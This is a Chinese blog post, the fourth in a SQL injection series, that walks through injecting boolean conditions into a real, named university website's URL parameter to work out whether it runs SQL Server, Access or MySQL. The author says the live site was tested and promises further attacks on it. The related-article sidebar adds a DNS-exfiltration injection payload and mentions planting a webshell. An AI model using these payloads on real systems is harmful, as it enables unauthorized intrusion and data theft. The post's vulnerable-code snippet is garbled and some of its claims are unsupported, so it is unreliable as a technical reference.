SQL注入——网络安全问题不容忽视!(四)

最新推荐文章于 2022-09-19 13:33:28 发布
最新推荐文章于 2022-09-19 13:33:28 发布
阅读量204 收藏
点赞数
分类专栏: 编程安全 文章标签: 网络 数据库 php 
 

 我们接着讲对数据库系统表的攻击 。

 

我们还是以中南大学党校管理系统为例子。

 

http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41    and  1=1

 

 

如果后台是有漏洞的  后台代码如下写

 

String  id=request.getparameter("id");   
  
select  * from   table  where id = id;

 

 

那么此时得到的id  为  41 and 1=1

 

  执行的sql语句为

 

select * from table where id=41 and 1=1

 

    这种情况id=41存在的话。那么where后面的语句总是执行为对的。

 

    首先我们攻击的第一步需要知道它是什么类型的数据库

 

  access  的msysobjects  这个在默认情况下不能访问

 

  sql server 的sysobjects 在默认情况下可以访问 

 

  mysql  的user 在默认情况下可以访问

 

   

   http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41    and  (select count(*)  from sysobjects )>0

 

 如何执行这个的效果和不加select count(*) 语句出现的页面效果一致的话,那么此系统为sqlserver。

 

 

 

后台的sql语句执行代码如下

 

 

 

 

select  * from table where id=41 and (select count(*) from  sysobjects) >0

 

   那么此时where条件成立则和id=41出现的页面是一致的。

 

  而如果

  http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from sysobjects )>0

  http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from msysobjects )>0

 

都执行不成功的话,那么则考虑是不是access 。 

 

 

如果执行下述代码成功的话,则为mysql

 

mysql> select * from admin where (select count(*) from mysql.user)>0;
+----+-------+-------+
| id | name  | pwd   |
+----+-------+-------+
|  1 | admin | admin |
+----+-------+-------+
1 row in set (0.12 sec)

 

也就是url写成

 

http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from mysql.user )>0

 

这种情况下返回的页面还和id=41一样的话那么。则此系统为mysql 。

 

中南大学党校管理管理系统经测试是用sqlserver做数据库的。

 

 

其实,我们根据经验可以想想 。现在国内70%以上的网站是用asp做的。而asp是微软做的。此外。access和sqlserver也都是微软做的。所以的话我们根据这个依据。有理由相信asp页面的关联数据库是access和sqlserver两个中的一个。而不是非微软制造的mysql。

 

如果是php页面那么我们就考虑mysql。而如果是jsp的话,那么考虑mysql的情况也是比较多的。

 

这一章讲了如何查看该网站所使用的数据库类型。

 

下节讲就对sqlserver数据库进行攻击。

 

 

 

 

 

 

 

 

 

觉明
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入漏洞详解
墨痕诉清风的博客
08-09 9350
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。
sql server 字段密码解密_SQL注入漏洞测试
weixin_39927059的博客
12-07 961
SQL注入漏洞测试 --Write Up题目用到的工具AES加密网站:http://tool.chacuo.net/cryptaesBASE64加密网站:https://www.sojson.com/base64.htmlMD5加密网站:https://www.cmd5.com/1.靶场https://www.mozhe.cn/bug/deta...
mysql注入万能密码_Natas14 Writeup(sql注入、sql万能密码)
weixin_39861255的博客
02-07 219
Natas14:是一个登录页面。源码如下。if(array_key_exists("username", $_REQUEST)) {$link = mysql_connect('localhost', 'natas14', '');mysql_select_db('natas14', $link);$query = "SELECT * from users where username=\"".$...
sql注入攻击实例_【SEA分享】Web渗透——SQL注入攻击原理及实例
weixin_39664995的博客
12-09 2979
相信点进来的你和我一样看不懂标题。没关系,不妨先了解一下,为什么我在网址栏里输入一串网址,就可以访问到这个网页。了解通信原理之后能帮助你更好的理解后面实例中的一顿“操作”。web通信原理介绍IP:ip 实际上就是生活中的地址,好像 XX省XX市XX区...... ,只不过 ip 是由数字组成。IP 分为内网ip 和 公网ip,公网地址是运营商分配,内网地址是路由器分配的。域名:方便记...
SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3498
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
SQL注入——网络安全问题不容忽视!(五)
04-05
SQL注入是一种常见的网络安全问题,它发生在应用程序不恰当地处理用户输入的数据时,导致数据库查询语句的结构被破坏,从而使攻击者能够执行恶意SQL命令。本文将深入探讨SQL注入的原理、危害、检测方法以及防范策略...
SQL注入攻击-网络安全攻防新焦点
11-13
### SQL注入攻击——网络安全攻防新焦点 #### 一、引言 随着互联网技术的快速发展以及网络应用的日益普及,网络安全问题变得越来越受到人们的关注。企业和个人为了保护自己的信息资产,纷纷采取各种措施来增强安全...
千里之堤,溃于蚁穴——揭密SQL注入攻击——初识SQL注入
06-26
通过深入了解SQL注入的原理和技术,不仅可以帮助开发者避免编写存在漏洞的应用程序,还可以增强网络安全意识,提高防御能力。随着技术的发展,防范SQL注入的方法也在不断进步,比如使用参数化查询、存储过程等技术...
数据泄露——应该引起关注的安全威胁.pdf
最新发布
04-01
数据泄露已经成为当前安全领域的一大焦点问题,特别是在通信技术迅速发展,大数据、云计算和物联网广泛应用的背景下,信息交换的频繁使得网络安全的重要性日益凸显。虽然现有的安全措施,如数据传输安全、上网行为...
「数据安全」云中行走,垂直电商助推器——云电商平台介绍 - 安全资讯.zip
11-28
最后,勒索软件的威胁不容忽视。云电商平台应建立强大的备份和恢复机制,以防数据被加密锁定,同时加强员工的安全意识培训,避免点击可疑链接或下载不明附件,降低被感染的风险。 总的来说,云电商平台的数据安全是...
SQL注入漏洞测试实战
weixin_47493074的博客
09-19 573
sqlmap小测试
[网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)
杨秀璋的专栏
03-24 6598
前文带领大家搭建一个Oracle+phpStudy本地网络渗透靶场,并应用SQL注入、XSS攻击、文件上传漏洞三个场景。这篇文章将跟着Cream老师兼好友学习,结合自己的经验详细介绍Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。注入漏洞是安全威胁中比较常见的漏洞,Oracle也是用得最广的数据库,希望这篇文章对您有帮助。真心觉得Cream老师讲解非常厉害,且看且珍惜。
SQL注入原理深度解析
等着你的出现
02-18 265
对于Web应用来说,注射式攻击由来已久,攻击方式也五花八门,常见的攻击方式有SQL注射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例,在源码级对其攻击原理进行深入的讲解。 一、注射式攻击的原理注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明。这使得攻击者有机会将程序命令当作用户输入的数据提交给Web程序,以发号施令,为所欲为。为了发动注射攻击,攻击者...
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 399
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
实验吧-简单的sql注入3 Writeup
baynk的博客
07-29 342
继续继续 过程 输入1,然后发现只有一个hello。。。好吧,肯定得盲注了,先试试闭合吧,果然还是单引号的,但是居然有报错信息,应该也可以使用报错注入吧。 然后再尝试干掉单引号的时候意外发现#居然可以用了,这真是省了不少事。。 想来想去还是使用报错注入,盲注还是交给sqlmap来解决吧。先来搞库名,用的floor(),结果来这么一出。 don't到底是个啥,又换了两种其他的报错,updatexm...
SQL注入漏洞(MSSQL注入
errorr0
07-05 2409
MSSQL注入的入门讲解
SQL注入篇——一句话木马
爱国小白帽
01-08 6383
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
牛腩学习---SQL注入
My Devil's Cry
03-27 1043
从上个星期6开始,几乎每天都看两集牛腩视频。自我感觉这个讲牛腩的老师讲得特别细致,几乎是手把手的教你如何做一个系统。正是由于这个老师教学的认真,让我明白了很多在重构的时候不是非常理解的一些概念,下面就让我来说说吧! 基础总结: 在前5集的时候,这个老师讲了数据库的设计和一些UML图的讲解!虽然和我学习的内容有一点不同,但是慢慢的听讲,感觉接受还是挺容易的!到了6-8集就可以加深
网络安全攻防实验室通关教程-注入关
热门推荐
黑面狐
10-19 1万+
网络安全实验室传送门: 地址:http://hackinglab.cn  第一题:最简单的SQL注入 查看网页源码,获取到提示,要登录admin 所以构造用户名  admin' or 'a'='a'#   密码随便填, 获取到flag 第2题:最简单的sql注入(熟悉环境) 查看网页源码获得提示参数id=1  是数字型注入 于是构造url    index.
理解SQL注入网络安全技术解析
这篇资源主要讲解了网络安全中的一个关键议题——SQL注入,这是针对Web服务器的一种常见攻击手段。SQL注入是指攻击者通过输入恶意的SQL语句,利用Web应用程序的安全漏洞,篡改数据库中的数据或者获取未经授权的信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值